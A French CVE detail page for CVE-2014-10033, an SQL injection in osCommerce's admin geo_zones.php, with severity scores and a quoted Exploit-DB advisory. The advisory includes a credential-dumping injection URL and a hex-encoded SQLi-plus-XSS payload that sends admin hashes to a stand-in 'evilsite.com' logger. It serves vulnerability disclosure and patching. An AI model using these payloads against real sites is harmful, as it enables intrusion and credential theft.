CVE-2014-10033 : Détail

CVE-2014-10033

SQL Injection
A03-Injection
0.17%V3
Network
2015-01-13
14h00 +00:00
2017-09-07
13h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

SQL injection vulnerability in the update_zone function in catalog/admin/geo_zones.php in osCommerce Online Merchant 2.3.3.4 and earlier allows remote administrators to execute arbitrary SQL commands via the zID parameter in a list action.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 31515

Date de publication : 2014-02-06 23h00 +00:00
Auteur : Ahmed Aboul-Ela
EDB Vérifié : Yes

# Title: osCommerce v2.x SQL Injection Vulnerability # Dork: Powered by osCommerce # Author: Ahmed Aboul-Ela # Contact: ahmed.aboul3la[at]gmail[dot]com - http://twitter.com/_secgeek # Vendor : http://www.oscommerce.com # Version: v2.3.3.4 (current latest release) and prior versions should be affected too # References: http://www.secgeek.net/oscommerce-v2x-sql-injection-vulnerability - Vulnerable Code snippet in "catalog/admin/geo_zones.php": <?php [...] LINE 138: $rows = 0; LINE 139: $zones_query_raw = "select a.association_id, a.zone_country_id, c.countries_name, a.zone_id, a.geo_zone_id, a.last_modified, a.date_added, z.zone_name from " . TABLE_ZONES_TO_GEO_ZONES . " a left join " . TABLE_COUNTRIES . " c on a.zone_country_id = c.countries_id left join " . TABLE_ZONES . " z on a.zone_id = z.zone_id where a.geo_zone_id = " . $HTTP_GET_VARS['zID'] . " order by association_id"; LINE 140: $zones_split = new splitPageResults($HTTP_GET_VARS['spage'], MAX_DISPLAY_SEARCH_RESULTS, $zones_query_raw, $zones_query_numrows); LINE 141: $zones_query = tep_db_query($zones_query_raw); [...] ?> As we can see at line 139 the GET zID parameter directly concatenated with the sql query without any type of sanitization which leads directly to sql injection vulnerability - Proof of Concept ( dump the admin username and password ): http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID=1 group by 1 union select 1,2,3,4,5,6,7,concat(user_name,0x3a,user_password) from administrators -- - Exploitation & Attack Scenario: an authenticated admin account is required to successfully exploit the vulnerability but it can be combined with other attack vectors like XSS / CSRF to achieve more dangerous successful remote attack Example to steal the administrator username & password and send it to php logger at "http://evilsite.com/logger.php?log=[ADMIN USER:HASH]" We can use hybrid attack technique ( SQL Injection + XSS ) : http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID= 1 group by 1 union select 1,2,3,4,5,6,7,concat(0x3c6469762069643d2274657374223e,user_name,0x3d,user_password,0x3c2f6469763e3c7363726970743e646f63756d656e742e6c6f636174696f6e2e687265663d22687474703a2f2f6576696c736974652e636f6d2f6c6f676765722e7068703f6c6f673d222b242822237465737422292e68746d6c28293c2f7363726970743e) from administrators -- - Mitigation: The vendor has released a quick fix for the vulnerability. It is strongly recommended to apply the patch now https://github.com/gburton/oscommerce2/commit/e4d90eccd7d9072ebe78da4c38fb048bfe31c902 - Time-Line: Mon, Feb 3, 2014 at 10:17 PM: vulnerability advisory sent to osCommerce Tue, Feb 4, 2014 at 01:14 AM: recevied initial reply from osCommerce Tue, Feb 4, 2014 at 02:06 AM: osCommerce released a quick fix for the vulnerability Thu, Feb 6, 2014 at 05:15 PM: the public responsible disclosure - Credits: Ahmed Aboul-Ela - Information Security Consultant @ Starware

Products Mentioned

Configuraton 0

Oscommerce>>Online_merchant >> Version To (including) 2.3.3.4

Références

http://www.exploit-db.com/exploits/31515
Tags : exploit, x_refsource_EXPLOIT-DB
http://osvdb.org/show/osvdb/103365
Tags : vdb-entry, x_refsource_OSVDB